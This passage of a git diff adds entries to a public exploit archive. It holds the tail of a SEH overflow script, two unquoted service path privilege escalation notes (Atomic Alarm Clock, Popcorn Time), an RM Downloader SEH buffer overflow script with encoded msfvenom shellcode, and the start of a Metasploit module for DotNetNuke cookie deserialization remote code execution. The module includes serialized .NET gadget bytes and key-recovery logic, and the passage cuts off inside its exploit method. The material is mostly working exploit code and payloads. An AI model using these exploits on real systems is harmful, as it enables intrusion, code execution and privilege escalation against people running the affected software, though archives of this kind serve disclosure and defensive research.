+buffer = junk1 + calc + junk2 + jmp2 + jmp1 + seh
+
+with open("overview.txt","wb") as f:
+ f.write(buffer[:-1])
\ No newline at end of file
diff --git a/exploits/windows/local/48352.txt b/exploits/windows/local/48352.txt
new file mode 100644
index 000000000..c14de10d9
--- /dev/null
+++ b/exploits/windows/local/48352.txt
@@ -0,0 +1,28 @@
+# Exploit Title: Atomic Alarm Clock x86 6.3 - 'AtomicAlarmClock' Unquoted Service Path
+# Exploit Author: boku
+# Date: 2020-04-17
+# Vendor Homepage: http://www.drive-software.com
+# Software Link: http://www.drive-software.com/download/ataclock.exe
+# Version: 6.3
+# Tested On: Windows 10 Pro 1909 (32-bit)
+# Vulnerability Type: Local Privilege Escalation by unquoted service path owned by 'LocalSystem'.
+
+# Vulnerability Description:
+# The Atomic Alarm Clock service "timeserv.exe" will load an arbitrary EXE and execute it with SYSTEM integrity.
+# This security misconfiguration by the vendor can be exploited locally or as part of an attack chain.
+# By placing a file named "Program.exe" on the root drive, an attacker can obtain persistent arbitrary code execution.
+# Under normal environmental conditions, this exploit ensures escalation of privileges from Admin to SYSTEM.
+
+C:\Users\boku>sc qc AtomicAlarmClock
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: AtomicAlarmClock
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files\Atomic Alarm Clock\timeserv.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Atomic Alarm Clock Time
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/48364.py b/exploits/windows/local/48364.py
new file mode 100755
index 000000000..9cc992e06
--- /dev/null
+++ b/exploits/windows/local/48364.py
@@ -0,0 +1,69 @@
+# Exploit Title: RM Downloader 3.1.3.2.2010.06.13 - 'Load' Buffer Overflow (SEH)
+# Date: 2020-04-20
+# Author: Felipe Winsnes
+# Software Link: https://www.exploit-db.com/apps/9af366e59468eac0b92212912b5c3bcb-RMDownloader.exe
+# Version: 3.1.3.2.2010.06.13
+# Tested on: Windows 7 (x86)
+
+# Proof of Concept:
+# 1.- Run the python script, it will create a new file "poc.txt"
+# 2.- Copy the content of the new file 'poc.txt' to clipboard
+# 3.- Open 'RmDownloader.exe'
+# 4.- Go to 'Load' tab
+# 5.- Paste clipboard in 'Load' parameter
+# 6.- Click on button 'OK'
+# 7.- Two messageboxes regarding the length of the payload will pop up, click OK
+# 8.- Profit
+
+# Blog where the vulnerability is explained: https://whitecr0wz.github.io/posts/RM-Downloader-SEH/
+
+import struct
+
+# msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread
+# Payload size: 448 bytes
+
+buf = b""
+buf += b"\x89\xe3\xda\xd0\xd9\x73\xf4\x5f\x57\x59\x49\x49\x49"
+buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
+buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
+buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
+buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x39\x78\x6b"
+buf += b"\x32\x53\x30\x57\x70\x57\x70\x35\x30\x4d\x59\x4d\x35"
+buf += b"\x46\x51\x79\x50\x72\x44\x4e\x6b\x56\x30\x76\x50\x4c"
+buf += b"\x4b\x50\x52\x66\x6c\x4c\x4b\x66\x32\x72\x34\x4e\x6b"
+buf += b"\x63\x42\x67\x58\x46\x6f\x4e\x57\x71\x5a\x47\x56\x35"
+buf += b"\x61\x4b\x4f\x6c\x6c\x65\x6c\x51\x71\x61\x6c\x73\x32"
+buf += b"\x66\x4c\x31\x30\x7a\x61\x6a\x6f\x54\x4d\x37\x71\x79"
+buf += b"\x57\x4d\x32\x4c\x32\x36\x32\x62\x77\x6c\x4b\x76\x32"
+buf += b"\x42\x30\x4e\x6b\x61\x5a\x45\x6c\x4c\x4b\x42\x6c\x32"
+buf += b"\x31\x42\x58\x4d\x33\x32\x68\x47\x71\x6b\x61\x70\x51"
+buf += b"\x6c\x4b\x61\x49\x47\x50\x33\x31\x4b\x63\x4e\x6b\x30"
+buf += b"\x49\x67\x68\x49\x73\x35\x6a\x30\x49\x6c\x4b\x45\x64"
+buf += b"\x4c\x4b\x35\x51\x69\x46\x45\x61\x4b\x4f\x4c\x6c\x4b"
+buf += b"\x71\x68\x4f\x34\x4d\x66\x61\x69\x57\x34\x78\x59\x70"
+buf += b"\x54\x35\x38\x76\x73\x33\x51\x6d\x39\x68\x35\x6b\x71"
+buf += b"\x6d\x56\x44\x30\x75\x5a\x44\x76\x38\x4c\x4b\x72\x78"
+buf += b"\x54\x64\x33\x31\x38\x53\x70\x66\x6e\x6b\x56\x6c\x70"
+buf += b"\x4b\x4e\x6b\x50\x58\x75\x4c\x55\x51\x78\x53\x4e\x6b"
+buf += b"\x56\x64\x6e\x6b\x73\x31\x6e\x30\x6e\x69\x37\x34\x56"
+buf += b"\x44\x71\x34\x53\x6b\x33\x6b\x63\x51\x61\x49\x73\x6a"
+buf += b"\x56\x31\x6b\x4f\x49\x70\x73\x6f\x31\x4f\x43\x6a\x4e"
+buf += b"\x6b\x67\x62\x6a\x4b\x6e\x6d\x73\x6d\x32\x4a\x46\x61"
+buf += b"\x6c\x4d\x4c\x45\x38\x32\x47\x70\x35\x50\x67\x70\x62"
+buf += b"\x70\x53\x58\x54\x71\x4c\x4b\x52\x4f\x4b\x37\x49\x6f"
+buf += b"\x38\x55\x6d\x6b\x49\x70\x65\x4d\x46\x4a\x75\x5a\x31"
+buf += b"\x78\x79\x36\x7a\x35\x6f\x4d\x6d\x4d\x4b\x4f\x68\x55"
+buf += b"\x65\x6c\x57\x76\x71\x6c\x47\x7a\x4f\x70\x49\x6b\x6b"
+buf += b"\x50\x74\x35\x37\x75\x6d\x6b\x61\x57\x75\x43\x71\x62"
+buf += b"\x72\x4f\x43\x5a\x65\x50\x66\x33\x6b\x4f\x6a\x75\x70"
+buf += b"\x63\x55\x31\x72\x4c\x31\x73\x76\x4e\x72\x45\x43\x48"
+buf += b"\x50\x65\x67\x70\x41\x41"
+
+
+nseh = struct.pack("<I", 0x06710870)
+seh = struct.pack("<I", 0x10031779) # 0x10031779 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [RDfilter03.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files\Mini-stream\RM Downloader\RDfilter03.dll)
+
+buffer = "A" * 9008 + nseh + seh + "\x41\x49" * 10 + buf + "\xff" * 200
+f = open ("poc.txt", "w")
+f.write(buffer)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/local/48378.txt b/exploits/windows/local/48378.txt
new file mode 100644
index 000000000..68c3eb333
--- /dev/null
+++ b/exploits/windows/local/48378.txt
@@ -0,0 +1,37 @@
+# Exploit Title: Popcorn Time 6.2 - 'Update service' Unquoted Service Path
+# Date: 2020-04-24
+# Vendor Homepage: https://getpopcorntime.is
+# Exploit Authors: Uriel Yochpaz & Jonatan Schor
+# Software Link: https://dl.getpopcorntime.is/PopcornTime-latest.exe
+# Version: 6.2.1.14 and probably prior versions
+# Tested on: Windows 10, 7
+# CVE : N/A
+
+[+] Description:
+Popcorn Time For Windows installs as a service with an unquoted
+service path running with SYSTEM privileges.
+This could potentially allow an authorized but non-privileged local
+user to execute arbitrary code with elevated privileges on the system.
+
+[+] POC:
+C:\Users\User>sc qc "Update service"
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: Update service
+ TYPE : 10 WIN32_OWN_PROCESS
+ START_TYPE : 2 AUTO_START
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\Popcorn Time\Updater.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : Update service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+[+] Exploit:
+A successful attempt would require the local user to be able to insert their
+code in "Program files (x86)" (popcorn.exe) or "C:\" (program.exe)
+folders undetected by the OS or other security applications
+where it could potentially be executed during application startup or reboot.
+If successful, the local user's code would execute with the elevated privileges
+of the application.
\ No newline at end of file
diff --git a/exploits/windows/remote/48336.rb b/exploits/windows/remote/48336.rb
new file mode 100755
index 000000000..35d4381fe
--- /dev/null
+++ b/exploits/windows/remote/48336.rb
@@ -0,0 +1,970 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core/exploit/powershell'
+require 'openssl'
+require 'set'
+
+class MetasploitModule < Msf::Exploit::Remote
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Exploit::Powershell
+ include Msf::Exploit::Remote::HttpServer
+
+ Rank = ExcellentRanking
+
+ # =================================
+ # Overidden setup method to allow
+ # for delayed handler start
+ # =================================
+ def setup
+ # Reset the session counts to zero.
+ reset_session_counts
+
+ return if !payload_instance
+ return if !handler_enabled?
+
+ # Configure the payload handler
+ payload_instance.exploit_config = {
+ 'active_timeout' => active_timeout
+ }
+
+ # payload handler is normally set up and started here
+ # but has been removed so we can start the handler when needed.
+ end
+
+ def initialize(info = {})
+ super(update_info(
+ info,
+ 'Name' => "DotNetNuke Cookie Deserialization Remote Code Execution",
+ 'Description' => %q(
+ This module exploits a deserialization vulnerability in DotNetNuke (DNN) versions 5.0.0 to 9.3.0-RC.
+ Vulnerable versions store profile information for users in the DNNPersonalization cookie as XML.
+ The expected structure includes a "type" attribute to instruct the server which type of object to create on deserialization.
+ The cookie is processed by the application whenever it attempts to load the current user's profile data.
+ This occurs when DNN is configured to handle 404 errors with its built-in error page (default configuration).
+ An attacker can leverage this vulnerability to execute arbitrary code on the system.
+ ),
+ 'License' => MSF_LICENSE,
+ 'Author' => [ 'Jon Park', 'Jon Seigel' ],
+ 'References' =>
+ [
+ [ 'CVE', '2017-9822' ],
+ [ 'CVE', '2018-15811'],
+ [ 'CVE', '2018-15812'],
+ [ 'CVE', '2018-18325'], # due to failure to patch CVE-2018-15811
+ [ 'CVE', '2018-18326'], # due to failure to patch CVE-2018-15812
+ [ 'URL', 'https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf'],
+ [ 'URL', 'https://googleprojectzero.blogspot.com/2017/04/exploiting-net-managed-dcom.html'],
+ [ 'URL', 'https://github.com/pwntester/ysoserial.net']
+ ],
+ 'Platform' => 'win',
+ 'Targets' =>
+ [
+ [ 'Automatic', { 'auto' => true } ],
+ [ 'v5.0 - v9.0.0', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
+ [ 'v9.0.1 - v9.1.1', { 'ReqEncrypt' => false, 'ReqSession' => false } ],
+ [ 'v9.2.0 - v9.2.1', { 'ReqEncrypt' => true, 'ReqSession' => true } ],
+ [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
+ ],
+ 'Stance' => Msf::Exploit::Stance::Aggressive,
+ 'Payload' =>
+ {
+
+ },
+ 'Privileged' => false,
+ 'DisclosureDate' => "Jul 20 2017",
+ 'DefaultOptions' => { 'WfsDelay' => 5 },
+ 'DefaultTarget' => 0
+ ))
+
+ deregister_options('SRVHOST')
+
+ register_options(
+ [
+ OptString.new('TARGETURI', [true, 'The path that will result in the DNN 404 response', '/__']),
+ OptBool.new('DryRun', [false, 'Performs target version check, finds encryption KEY and IV values if required, and outputs a cookie payload', false]),
+ OptString.new('VERIFICATION_PLAIN', [false, %q(The known (full or partial) plaintext of the encrypted verification code.
+ Typically in the format of {portalID}-{userID} where portalID is an integer and userID is either an integer or GUID (v9.2.2+)), '']),
+ OptBool.new('ENCRYPTED', [true, %q(Whether or not to encrypt the final payload cookie;
+ (VERIFICATION_CODE and VERIFICATION_PLAIN) or (KEY and IV) are required if set to true.), false]),
+ OptString.new('KEY', [false, 'The key to use for encryption.', '']),
+ OptString.new('IV', [false, 'The initialization vector to use for encryption.', '']),
+ OptString.new('SESSION_TOKEN', [false, %q(The .DOTNETNUKE session cookie to use when submitting the payload to the target server.
+ DNN versions 9.2.0+ require the attack to be submitted from an authenticated context.), '']),
+ OptString.new('VERIFICATION_CODE', [false, %q(The encrypted verification code received in a registration email.
+ Can also be the path to a file containing a list of verification codes.), ''])
+ ]
+ )
+
+
+ initialize_instance_variables
+ end
+
+ def initialize_instance_variables
+ # ==================
+ # COMMON VARIABLES
+ # ==================
+
+ @target_idx = 0
+
+ # Flag for whether or not to perform exploitation
+ @dry_run = false
+
+ # Flag for whether or not the target requires encryption
+ @encrypted = false
+
+ # Flag for whether or not to attempt to decrypt the provided verification token(s)
+ @try_decrypt = false
+
+ # ==================
+ # PAYLOAD VARIABLES
+ # ==================
+
+ # ObjectStateFormatter serialized header
+ @osf_header = [255, 1, 50]
+
+ # ObjectStateFormatter serialized data before the command payload
+ @osf_wrapper_start = [
+ 0, 1, 0, 0, 0, 255, 255, 255, 255, 1, 0, 0, 0, 0, 0, 0, 0, 12, 2, 0, 0, 0, 73,
+ 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
+ 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101,
+ 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84,
+ 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101,
+ 48, 56, 57, 5, 1, 0, 0, 0, 132, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111,
+ 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105,
+ 99, 46, 83, 111, 114, 116, 101, 100, 83, 101, 116, 96, 49, 91, 91, 83, 121,
+ 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111,
+ 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48,
+ 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117,
+ 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111,
+ 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56,
+ 57, 93, 93, 4, 0, 0, 0, 5, 67, 111, 117, 110, 116, 8, 67, 111, 109, 112, 97,
+ 114, 101, 114, 7, 86, 101, 114, 115, 105, 111, 110, 5, 73, 116, 101, 109, 115,
+ 0, 3, 0, 6, 8, 141, 1, 83, 121, 115, 116, 101, 109, 46, 67, 111, 108, 108, 101,
+ 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101, 114, 105, 99, 46, 67, 111,
+ 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109, 112, 97, 114, 101, 114,
+ 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103,
+ 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105,
+ 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
+ 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
+ 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
+ 57, 51, 52, 101, 48, 56, 57, 93, 93, 8, 2, 0, 0, 0, 2, 0, 0, 0, 9, 3, 0, 0, 0,
+ 2, 0, 0, 0, 9, 4, 0, 0, 0, 4, 3, 0, 0, 0, 141, 1, 83, 121, 115, 116, 101, 109,
+ 46, 67, 111, 108, 108, 101, 99, 116, 105, 111, 110, 115, 46, 71, 101, 110, 101,
+ 114, 105, 99, 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 67, 111, 109,
+ 112, 97, 114, 101, 114, 96, 49, 91, 91, 83, 121, 115, 116, 101, 109, 46, 83,
+ 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32,
+ 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
+ 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80,
+ 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55,
+ 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 93, 1, 0, 0, 0, 11,
+ 95, 99, 111, 109, 112, 97, 114, 105, 115, 111, 110, 3, 34, 83, 121, 115, 116,
+ 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
+ 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 5, 0, 0, 0,
+ 17, 4, 0, 0, 0, 2, 0, 0, 0, 6, 6, 0, 0, 0
+ ]
+
+ # ObjectStateFormatter serialized data to place after the command payload.
+ @osf_wrapper_end = [
+ 6, 7, 0, 0, 0, 3, 99, 109, 100, 4, 5, 0, 0, 0, 34, 83, 121, 115, 116, 101,
+ 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108,
+ 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 3, 0, 0, 0, 8,
+ 68, 101, 108, 101, 103, 97, 116, 101, 7, 109, 101, 116, 104, 111, 100, 48, 7,
+ 109, 101, 116, 104, 111, 100, 49, 3, 3, 3, 48, 83, 121, 115, 116, 101, 109,
+ 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105,
+ 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108,
+ 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 47, 83, 121, 115, 116, 101,
+ 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
+ 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
+ 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 47, 83, 121, 115, 116, 101,
+ 109, 46, 82, 101, 102, 108, 101, 99, 116, 105, 111, 110, 46, 77, 101, 109,
+ 98, 101, 114, 73, 110, 102, 111, 83, 101, 114, 105, 97, 108, 105, 122, 97,
+ 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 9, 8, 0, 0, 0, 9, 9, 0, 0,
+ 0, 9, 10, 0, 0, 0, 4, 8, 0, 0, 0, 48, 83, 121, 115, 116, 101, 109, 46, 68,
+ 101, 108, 101, 103, 97, 116, 101, 83, 101, 114, 105, 97, 108, 105, 122, 97,
+ 116, 105, 111, 110, 72, 111, 108, 100, 101, 114, 43, 68, 101, 108, 101, 103,
+ 97, 116, 101, 69, 110, 116, 114, 121, 7, 0, 0, 0, 4, 116, 121, 112, 101, 8,
+ 97, 115, 115, 101, 109, 98, 108, 121, 6, 116, 97, 114, 103, 101, 116, 18,
+ 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 65, 115, 115, 101, 109, 98,
+ 108, 121, 14, 116, 97, 114, 103, 101, 116, 84, 121, 112, 101, 78, 97, 109,
+ 101, 10, 109, 101, 116, 104, 111, 100, 78, 97, 109, 101, 13, 100, 101, 108,
+ 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 1, 1, 2, 1, 1, 1, 3, 48, 83,
+ 121, 115, 116, 101, 109, 46, 68, 101, 108, 101, 103, 97, 116, 101, 83, 101,
+ 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
+ 114, 43, 68, 101, 108, 101, 103, 97, 116, 101, 69, 110, 116, 114, 121, 6, 11,
+ 0, 0, 0, 176, 2, 83, 121, 115, 116, 101, 109, 46, 70, 117, 110, 99, 96, 51,
+ 91, 91, 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32,
+ 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111,
+ 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114,
+ 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99,
+ 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49,
+ 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83, 121, 115, 116, 101, 109, 46, 83,
+ 116, 114, 105, 110, 103, 44, 32, 109, 115, 99, 111, 114, 108, 105, 98, 44,
+ 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32,
+ 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44,
+ 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98,
+ 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93, 44, 91, 83,
+ 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
+ 115, 46, 80, 114, 111, 99, 101, 115, 115, 44, 32, 83, 121, 115, 116, 101,
+ 109, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46,
+ 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114,
+ 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101,
+ 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 93,
+ 93, 6, 12, 0, 0, 0, 75, 109, 115, 99, 111, 114, 108, 105, 98, 44, 32, 86,
+ 101, 114, 115, 105, 111, 110, 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67,
+ 117, 108, 116, 117, 114, 101, 61, 110, 101, 117, 116, 114, 97, 108, 44, 32,
+ 80, 117, 98, 108, 105, 99, 75, 101, 121, 84, 111, 107, 101, 110, 61, 98, 55,
+ 55, 97, 53, 99, 53, 54, 49, 57, 51, 52, 101, 48, 56, 57, 10, 6, 13, 0, 0, 0,
+ 73, 83, 121, 115, 116, 101, 109, 44, 32, 86, 101, 114, 115, 105, 111, 110,
+ 61, 52, 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61,
+ 110, 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
+ 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
+ 52, 101, 48, 56, 57, 6, 14, 0, 0, 0, 26, 83, 121, 115, 116, 101, 109, 46, 68,
+ 105, 97, 103, 110, 111, 115, 116, 105, 99, 115, 46, 80, 114, 111, 99, 101,
+ 115, 115, 6, 15, 0, 0, 0, 5, 83, 116, 97, 114, 116, 9, 16, 0, 0, 0, 4, 9, 0,
+ 0, 0, 47, 83, 121, 115, 116, 101, 109, 46, 82, 101, 102, 108, 101, 99, 116,
+ 105, 111, 110, 46, 77, 101, 109, 98, 101, 114, 73, 110, 102, 111, 83, 101,
+ 114, 105, 97, 108, 105, 122, 97, 116, 105, 111, 110, 72, 111, 108, 100, 101,
+ 114, 7, 0, 0, 0, 4, 78, 97, 109, 101, 12, 65, 115, 115, 101, 109, 98, 108,
+ 121, 78, 97, 109, 101, 9, 67, 108, 97, 115, 115, 78, 97, 109, 101, 9, 83,
+ 105, 103, 110, 97, 116, 117, 114, 101, 10, 83, 105, 103, 110, 97, 116, 117,
+ 114, 101, 50, 10, 77, 101, 109, 98, 101, 114, 84, 121, 112, 101, 16, 71, 101,
+ 110, 101, 114, 105, 99, 65, 114, 103, 117, 109, 101, 110, 116, 115, 1, 1, 1,
+ 1, 1, 0, 3, 8, 13, 83, 121, 115, 116, 101, 109, 46, 84, 121, 112, 101, 91,
+ 93, 9, 15, 0, 0, 0, 9, 13, 0, 0, 0, 9, 14, 0, 0, 0, 6, 20, 0, 0, 0, 62, 83,
+ 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105, 99,
+ 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40, 83,
+ 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
+ 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 6, 21, 0, 0, 0, 62,
+ 83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105,
+ 99, 115, 46, 80, 114, 111, 99, 101, 115, 115, 32, 83, 116, 97, 114, 116, 40,
+ 83, 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83,
+ 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0,
+ 10, 1, 10, 0, 0, 0, 9, 0, 0, 0, 6, 22, 0, 0, 0, 7, 67, 111, 109, 112, 97,
+ 114, 101, 9, 12, 0, 0, 0, 6, 24, 0, 0, 0, 13, 83, 121, 115, 116, 101, 109,
+ 46, 83, 116, 114, 105, 110, 103, 6, 25, 0, 0, 0, 43, 73, 110, 116, 51, 50,
+ 32, 67, 111, 109, 112, 97, 114, 101, 40, 83, 121, 115, 116, 101, 109, 46,
+ 83, 116, 114, 105, 110, 103, 44, 32, 83, 121, 115, 116, 101, 109, 46, 83,
+ 116, 114, 105, 110, 103, 41, 6, 26, 0, 0, 0, 50, 83, 121, 115, 116, 101,
+ 109, 46, 73, 110, 116, 51, 50, 32, 67, 111, 109, 112, 97, 114, 101, 40, 83,
+ 121, 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 83, 121,
+ 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 41, 8, 0, 0, 0, 10, 1,
+ 16, 0, 0, 0, 8, 0, 0, 0, 6, 27, 0, 0, 0, 113, 83, 121, 115, 116, 101, 109,
+ 46, 67, 111, 109, 112, 97, 114, 105, 115, 111, 110, 96, 49, 91, 91, 83, 121,
+ 115, 116, 101, 109, 46, 83, 116, 114, 105, 110, 103, 44, 32, 109, 115, 99,
+ 111, 114, 108, 105, 98, 44, 32, 86, 101, 114, 115, 105, 111, 110, 61, 52,
+ 46, 48, 46, 48, 46, 48, 44, 32, 67, 117, 108, 116, 117, 114, 101, 61, 110,
+ 101, 117, 116, 114, 97, 108, 44, 32, 80, 117, 98, 108, 105, 99, 75, 101,
+ 121, 84, 111, 107, 101, 110, 61, 98, 55, 55, 97, 53, 99, 53, 54, 49, 57, 51,
+ 52, 101, 48, 56, 57, 93, 93, 9, 12, 0, 0, 0, 10, 9, 12, 0, 0, 0, 9, 24, 0,
+ 0, 0, 9, 22, 0, 0, 0, 10, 11
+ ]
+
+ @cr_regex = /(?<=Copyright \(c\) 2002-)(\d{4})/
+
+ # ==================
+ # v9.1.1+ VARIABLES
+ # ==================
+
+
+ @key_charset = "02468ABDF"
+ @verification_codes = []
+
+ @iv_regex = /[0-9A-F]{8}/
+
+ # Known plaintext
+ @kpt = ""
+
+ # Encryption objects
+ @decryptor = OpenSSL::Cipher.new('des')
+ @decryptor.decrypt
+
+ @encryptor = OpenSSL::Cipher.new('des')
+ @encryptor.encrypt
+
+ # final passphrase (key +iv) to use for payload (v9.1.1+)
+ @passphrase = ""
+
+ # ==================
+ # v9.2.0+ VARIABLES
+ # ==================
+
+ # Session token needed for exploitation (v9.2.0+)
+ @session_token = ""
+
+ # ==================
+ # v9.2.2+ VARIABLES
+ # ==================
+
+ # User ID format (v9.2.2+)
+ # Number of characters of user ID available in plaintext
+ # is equal to the length of a GUID (no spaces or dashes)
+ # minus (blocksize - known plaintext length).
+ @user_id_pt_length = 32 - (8 - @kpt.length)
+ @user_id_regex = /[0-9a-f]{#{@user_id_pt_length}}/
+
+ # Plaintext found from decryption (v9.2.2+)
+ @found_pt = ""
+
+ @iv_charset = "0123456789abcdef"
+
+ # Possible IVs used to encrypt verification codes (v9.2.2+)
+ @possible_ivs = Set.new([])
+
+ # Possible keys used to encrypt verification codes (v9.2.2+)
+ @possible_keys = Set.new([])
+
+ # passphrases (key + iv) values to use for payload encryption (v9.2.2+)
+ @passphrases = []
+
+ # char sets to use when generating possible base keys
+ @unchanged = Set.new([65,70])
+ end
+
+ def decode_verification(code)
+ # Decode verification code base don DNN format
+ return String.new(
+ Rex::Text.decode_base64(
+ code.chomp.gsub(".", "+").gsub("-", "/").gsub("_", "=")
+ )
+ )
+ end
+
+ # ==============
+ # Main function
+ # ==============
+ def exploit
+
+ return unless check == Exploit::CheckCode::Appears
+
+ @encrypted = datastore['ENCRYPTED']
+ verification_code = datastore['VERIFICATION_CODE']
+ if File.file?(verification_code)
+ File.readlines(verification_code).each do |code|
+ @verification_codes.push(decode_verification(code))
+ end
+ else
+ @verification_codes.push(decode_verification(verification_code))
+ end
+
+ @kpt = datastore['VERIFICATION_PLAIN']
+
+ @session_token = datastore['SESSION_TOKEN']
+ @dry_run = datastore['DryRun']
+ key = datastore['KEY']
+ iv = datastore['IV']
+
+ if target['ReqEncrypt'] && @encrypted == false
+ print_warning("Target requires encrypted payload. Exploit may not succeed.")
+ end
+
+ if @encrypted
+ # Requires either supplied key and IV, or verification code and plaintext
